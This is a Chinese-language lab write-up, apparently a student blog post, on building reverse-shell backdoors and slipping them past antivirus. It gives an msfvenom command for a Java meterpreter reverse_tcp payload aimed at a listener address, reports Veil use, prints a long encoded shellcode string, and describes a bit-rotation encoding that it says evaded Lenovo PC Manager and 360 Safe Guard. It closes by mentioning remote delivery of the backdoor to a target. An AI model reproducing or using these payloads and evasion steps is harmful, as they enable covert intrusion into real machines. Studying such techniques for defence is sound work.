使用指令:msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.157.141 lport=5234 x> 5234_backjar.jar
上傳掃描的結果:
結果還行java
下載安裝好veil以後,進入veil生成
回連成功:
掃描結果:
shell
生成Shellcode:
\x7f\x6b\x1\x83\x83\x83\xe3\xa\x66\xb2\x43\xe7\x8\xd3\xb3\x8\xd1\x8f\x8\xd1\x97\x8\xf1\xab\x8c\x34\xc9\xa5\xb2\x7c\x2f\xbf\xe2\xff\x81\xaf\xa3\x42\x4c\x8e\x82\x44\x61\x71\xd1\xd4\x8\xd1\x93\x8\xc9\xbf\x8\xcf\x92\xfb\x60\xcb\x82\x52\xd2\x8\xda\xa3\x82\x50\x8\xca\x9b\x60\xb9\xca\x8\xb7\x8\x82\x55\xb2\x7c\x2f\x42\x4c\x8e\x82\x44\xbb\x63\xf6\x75\x80\xfe\x7b\xb8\xfe\xa7\xf6\x67\xdb\x8\xdb\xa7\x82\x50\xe5\x8\x8f\xc8\x8\xdb\x9f\x82\x50\x8\x87\x8\x82\x53\xa\xc7\xa7\xa7\xd8\xd8\xe2\xda\xd9\xd2\x7c\x63\xdc\xdc\xd9\x8\x91\x68\xe\xde\xeb\xb0\xb1\x83\x83\xeb\xf4\xf0\xb1\xdc\xd7\xeb\xcf\xf4\xa5\x84\xa\x6b\x7c\x53\x3b\x13\x82\x83\x83\xaa\x47\xd7\xd3\xeb\xaa\x3\xe8\x83\x7c\x56\xe9\x89\xeb\x43\x2b\x1e\xe\xeb\x81\x83\x82\x38\xa\x65\xd3\xd3\xd3\xd3\xc3\xd3\xc3\xd3\xeb\x69\x8c\x5c\x63\x7c\x56\x14\xe9\x93\xd5\xd4\xeb\x1a\x26\xf7\xe2\x7c\x56\x6\x43\xf7\x89\x7c\xcd\x8b\xf6\x6f\x6b\xe4\x83\x83\x83\xe9\x83\xe9\x87\xd5\xd4\xeb\x81\x5a\x4b\xdc\x7c\x56\x0\x7b\x83\xfd\xb5\x8\xb5\xe9\xc3\xeb\x83\x93\x83\x83\xd5\xe9\x83\xeb\xdb\x27\xd0\x66\x7c\x56\x10\xd0\xe9\x83\xd5\xd0\xd4\xeb\x81\x5a\x4b\xdc\x7c\x56\x0\x7b\x83\xfe\xab\xdb\xeb\x83\xc3\x83\x83\xe9\x83\xd3\xeb\x88\xac\x8c\xb3\x7c\x56\xd4\xeb\xf6\xed\xce\xe2\x7c\x56\xdd\xdd\x7c\x8f\xa7\x8c\x6\xf3\x7c\x7c\x7c\x6a\x18\x7c\x7c\x7c\x82\x40\xaa\x45\xf6\x42\x40\x38\x73\x36\x21\xd5\xe9\x83\xd0\x7c\x56
運行回連成功:
編程
讀取每一個Shellcode字節,並循環向左移位3位,從新輸出整個code,在嵌入的代碼里加上循環向右移位3位 掃描結果:
然後執行回連成功:
使用聯想電腦管家查殺:
安全
使用的是360安全衛士:
回連成功:
tcp
觀察行爲特徵工具
掩蓋行爲特徵從而避免被查殺編碼
改變自身特徵碼3d
生成shellcode後咱們經常使用的殺毒軟件就檢測不出來了,因此之後仍是要當心,不能徹底信任殺毒軟件code
遠程將後門傳給目標機,而後讓其本身運行。blog